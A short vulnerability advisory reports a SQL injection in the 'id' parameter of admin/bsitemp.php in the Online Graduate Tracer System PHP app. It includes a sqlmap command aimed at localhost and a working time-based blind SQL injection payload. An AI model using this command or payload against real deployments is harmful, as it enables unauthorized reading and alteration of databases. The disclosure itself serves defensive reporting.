Online Graduate Tracer System bsitemp.php sql injection
url:admin/bsitemp.php
Abstract:
Line 243 of bsitemp.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
-
Data enters a program from an untrusted source.
-
The data is used to dynamically construct a SQL query.
In this case, the data is passed to mysqli_query() in bsitemp.php on line 243.
sqlmap.py -u "http://localhost/tracking/admin/bsitemp.php?id=111" --level 5 --risk 3 --current-db
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=111'+(SELECT 0x67437261 WHERE 6269=6269 AND (SELECT 8178 FROM (SELECT(SLEEP(5)))mMBg))+'
Download Code:
https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html